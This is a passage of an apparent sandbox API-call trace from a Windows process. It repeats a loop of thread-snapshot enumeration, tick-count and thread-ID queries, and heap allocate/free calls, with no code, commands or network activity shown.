(HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.728] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.729] GetTickCount () returned 0x11f06d2 [0096.729] GetCurrentThreadId () returned 0x42c [0096.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.729] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.730] GetTickCount () returned 0x11f06d2 [0096.730] GetCurrentThreadId () returned 0x42c [0096.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.730] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.731] GetTickCount () returned 0x11f06d2 [0096.731] GetCurrentThreadId () returned 0x42c [0096.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.731] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.732] GetTickCount () returned 0x11f06d2 [0096.732] GetCurrentThreadId () returned 0x42c [0096.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.732] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.733] GetTickCount () returned 0x11f06d2 [0096.733] GetCurrentThreadId () returned 0x42c [0096.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.733] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.734] GetTickCount () returned 0x11f06d2 [0096.734] GetCurrentThreadId () returned 0x42c [0096.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.734] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.735] GetTickCount () returned 0x11f06d2 [0096.735] GetCurrentThreadId () returned 0x42c [0096.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.735] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.736] GetTickCount () returned 0x11f06d2 [0096.736] GetCurrentThreadId () returned 0x42c [0096.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.736] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.737] GetTickCount () returned 0x11f06d2 [0096.737] GetCurrentThreadId () returned 0x42c [0096.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.737] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.738] GetTickCount () returned 0x11f06d2 [0096.738] GetCurrentThreadId () returned 0x42c [0096.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.738] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.739] GetTickCount () returned 0x11f06d2 [0096.739] GetCurrentThreadId () returned 0x42c [0096.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.739] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.740] GetTickCount () returned 0x11f06d2 [0096.740] GetCurrentThreadId () returned 0x42c [0096.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.740] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.741] GetTickCount () returned 0x11f06d2 [0096.741] GetCurrentThreadId () returned 0x42c [0096.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.741] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.742] GetTickCount () returned 0x11f06d2 [0096.742] GetCurrentThreadId () returned 0x42c [0096.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.742] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.743] GetTickCount () returned 0x11f06d2 [0096.743] GetCurrentThreadId () returned 0x42c [0096.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.743] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.744] GetTickCount () returned 0x11f06e1 [0096.744] GetCurrentThreadId () returned 0x42c [0096.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.744] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.745] GetTickCount () returned 0x11f06e1 [0096.745] GetCurrentThreadId () returned 0x42c [0096.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.745] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.746] GetTickCount () returned 0x11f06e1 [0096.746] GetCurrentThreadId () returned 0x42c [0096.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.746] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.747] GetTickCount () returned 0x11f06e1 [0096.747] GetCurrentThreadId () returned 0x42c [0096.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.747] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.748] GetTickCount () returned 0x11f06e1 [0096.748] GetCurrentThreadId () returned 0x42c [0096.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.748] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.749] GetTickCount () returned 0x11f06e1 [0096.749] GetCurrentThreadId () returned 0x42c [0096.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.749] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.750] GetTickCount () returned 0x11f06e1 [0096.750] GetCurrentThreadId () returned 0x42c [0096.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.750] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.751] GetTickCount () returned 0x11f06e1 [0096.751] GetCurrentThreadId () returned 0x42c [0096.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.751] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.752] GetTickCount () returned 0x11f06e1 [0096.752] GetCurrentThreadId () returned 0x42c [0096.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.752] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.753] GetTickCount () returned 0x11f06e1 [0096.753] GetCurrentThreadId () returned 0x42c [0096.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.753] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.754] GetTickCount () returned 0x11f06e1 [0096.754] GetCurrentThreadId () returned 0x42c [0096.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.754] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.755] GetTickCount () returned 0x11f06e1 [0096.755] GetCurrentThreadId () returned 0x42c [0096.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.755] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.756] GetTickCount () returned 0x11f06e1 [0096.756] GetCurrentThreadId () returned 0x42c [0096.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.756] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.756] GetTickCount () returned 0x11f06e1 [0096.757] GetCurrentThreadId () returned 0x42c [0096.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.757] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.757] GetTickCount () returned 0x11f06e1 [0096.757] GetCurrentThreadId () returned 0x42c [0096.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.758] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.758] GetTickCount () returned 0x11f06e1 [0096.758] GetCurrentThreadId () returned 0x42c [0096.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.759] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.760] GetTickCount () returned 0x11f06f1 [0096.760] GetCurrentThreadId () returned 0x42c [0096.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.760] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.761] GetTickCount () returned 0x11f06f1 [0096.761] GetCurrentThreadId () returned 0x42c [0096.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.761] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.761] GetTickCount () returned 0x11f06f1 [0096.761] GetCurrentThreadId () returned 0x42c [0096.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.762] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.762] GetTickCount () returned 0x11f06f1 [0096.762] GetCurrentThreadId () returned 0x42c [0096.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.763] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.763] GetTickCount () returned 0x11f06f1 [0096.763] GetCurrentThreadId () returned 0x42c [0096.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.763] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.765] GetTickCount () returned 0x11f06f1 [0096.765] GetCurrentThreadId () returned 0x42c [0096.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.765] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.766] GetTickCount () returned 0x11f06f1 [0096.766] GetCurrentThreadId () returned 0x42c [0096.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.766] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.766] GetTickCount () returned 0x11f06f1 [0096.767] GetCurrentThreadId () returned 0x42c [0096.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.767] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.767] GetTickCount () returned 0x11f06f1 [0096.767] GetCurrentThreadId () returned 0x42c [0096.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.768] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.768] GetTickCount () returned 0x11f06f1 [0096.768] GetCurrentThreadId () returned 0x42c [0096.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.769] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.769] GetTickCount () returned 0x11f06f1 [0096.769] GetCurrentThreadId () returned 0x42c [0096.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.769] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.770] GetTickCount () returned 0x11f06f1 [0096.770] GetCurrentThreadId () returned 0x42c [0096.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.770] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.771] GetTickCount () returned 0x11f06f1 [0096.771] GetCurrentThreadId () returned 0x42c [0096.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.771] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.772] GetTickCount () returned 0x11f06f1 [0096.772] GetCurrentThreadId () returned 0x42c [0096.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.772] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.773] GetTickCount () returned 0x11f06f1 [0096.773] GetCurrentThreadId () returned 0x42c [0096.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.773] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.774] GetTickCount () returned 0x11f06f1 [0096.774] GetCurrentThreadId () returned 0x42c [0096.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.774] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.775] GetTickCount () returned 0x11f0700 [0096.775] GetCurrentThreadId () returned 0x42c [0096.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.775] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.776] GetTickCount () returned 0x11f0700 [0096.776] GetCurrentThreadId () returned 0x42c [0096.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.776] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.777] GetTickCount () returned 0x11f0700 [0096.777] GetCurrentThreadId () returned 0x42c [0096.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.777] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.778] GetTickCount () returned 0x11f0700 [0096.778] GetCurrentThreadId () returned 0x42c [0096.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.778] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.779] GetTickCount () returned 0x11f0700 [0096.779] GetCurrentThreadId () returned 0x42c [0096.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.779] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.780] GetTickCount () returned 0x11f0700 [0096.780] GetCurrentThreadId () returned 0x42c [0096.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.780] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.781] GetTickCount () returned 0x11f0700 [0096.781] GetCurrentThreadId () returned 0x42c [0096.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.781] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.782] GetTickCount () returned 0x11f0700 [0096.782] GetCurrentThreadId () returned 0x42c [0096.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.782] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.783] GetTickCount () returned 0x11f0700 [0096.783] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.784] GetTickCount () returned 0x11f0700 [0096.784] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.784] GetTickCount () returned 0x11f0700 [0096.785] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.785] GetTickCount () returned 0x11f0700 [0096.785] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.786] GetTickCount () returned 0x11f0700 [0096.786] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.787] GetTickCount () returned 0x11f0700 [0096.787] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.788] GetTickCount () returned 0x11f0700 [0096.788] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.789] GetTickCount () returned 0x11f0700 [0096.789] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.790] GetTickCount () returned 0x11f0700 [0096.790] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.791] GetTickCount () returned 0x11f0710 [0096.791] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.791] GetTickCount () returned 0x11f0710 [0096.791] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.792] GetTickCount () returned 0x11f0710 [0096.792] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.793] GetTickCount () returned 0x11f0710 [0096.793] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.794] GetTickCount () returned 0x11f0710 [0096.794] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.795] GetTickCount () returned 0x11f0710 [0096.795] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.796] GetTickCount () returned 0x11f0710 [0096.796] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.796] GetTickCount () returned 0x11f0710 [0096.796] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.797] GetTickCount () returned 0x11f0710 [0096.797] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.798] GetTickCount () returned 0x11f0710 [0096.798] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.799] GetTickCount () returned 0x11f0710 [0096.799] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.800] GetTickCount () returned 0x11f0710 [0096.800] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.801] GetTickCount () returned 0x11f0710 [0096.801] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.802] GetTickCount () returned 0x11f0710 [0096.802] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.802] GetTickCount () returned 0x11f0710 [0096.802] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.803] GetTickCount () returned 0x11f0710 [0096.803] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.804] GetTickCount () returned 0x11f0710 [0096.804] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.805] GetTickCount () returned 0x11f0710 [0096.805] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.806] GetTickCount () returned 0x11f0720 [0096.806] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.807] GetTickCount () returned 0x11f0720 [0096.807] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.808] GetTickCount () returned 0x11f0720 [0096.808] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.809] GetTickCount () returned 0x11f0720 [0096.809] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.809] GetTickCount () returned 0x11f0720 [0096.809] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.810] GetTickCount () returned 0x11f0720 [0096.810] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.811] GetTickCount () returned 0x11f0720 [0096.811] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.812] GetTickCount () returned 0x11f0720 [0096.812] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.813] GetTickCount () returned 0x11f0720 [0096.813] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.814] GetTickCount () returned 0x11f0720 [0096.814] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.815] GetTickCount () returned 0x11f0720 [0096.815] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.816] GetTickCount () returned 0x11f0720 [0096.816] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.817] GetTickCount () returned 0x11f0720 [0096.817] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.818] GetTickCount () returned 0x11f0720 [0096.818] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.818] GetTickCount () returned 0x11f0720 [0096.818] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.819] GetTickCount () returned 0x11f0720 [0096.819] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.820] GetTickCount () returned 0x11f0720 [0096.820] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.821] GetTickCount () returned 0x11f0720 [0096.821] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.822] GetTickCount () returned 0x11f072f [0096.822] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.823] GetTickCount () returned 0x11f072f [0096.823] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.824] GetTickCount () returned 0x11f072f [0096.824] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.825] GetTickCount () returned 0x11f072f [0096.825] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.825] GetTickCount () returned 0x11f072f [0096.825] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.826] GetTickCount () returned 0x11f072f [0096.826] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.827] GetTickCount () returned 0x11f072f [0096.827] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.828] GetTickCount () returned 0x11f072f [0096.828] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.829] GetTickCount () returned 0x11f072f [0096.829] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.830] GetTickCount () returned 0x11f072f [0096.830] Thread32Next 